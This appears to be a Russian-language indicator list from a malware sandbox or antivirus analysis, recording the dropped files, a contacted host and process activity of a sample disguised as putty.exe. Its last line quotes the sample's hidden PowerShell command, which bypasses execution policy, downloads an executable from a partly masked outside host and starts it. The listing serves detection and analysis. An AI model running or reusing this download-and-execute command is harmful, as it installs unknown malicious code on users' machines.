Техническая информация
- http://le#######kokkiskikinew.ydns.eu/putty.exe как %appdata%\putty.exe
- %TEMP%\abdtfhghgdghghВќ.sct
- %APPDATA%\putty.exe
- %TEMP%\putty_2500_0.chm
- %APPDATA%\microsoft\html help\hh.dat
- %TEMP%\imt820a.tmp
- 'le#######kokkiskikinew.ydns.eu':80
- http://le#######kokkiskikinew.ydns.eu/putty.exe
- DNS ASK le#######kokkiskikinew.ydns.eu
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%APPDATA%\putty.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://le#######kokkiskikinew.ydns.eu/putty.exe','%APPDATA%\putty.exe');Start...' (со скрытым окном)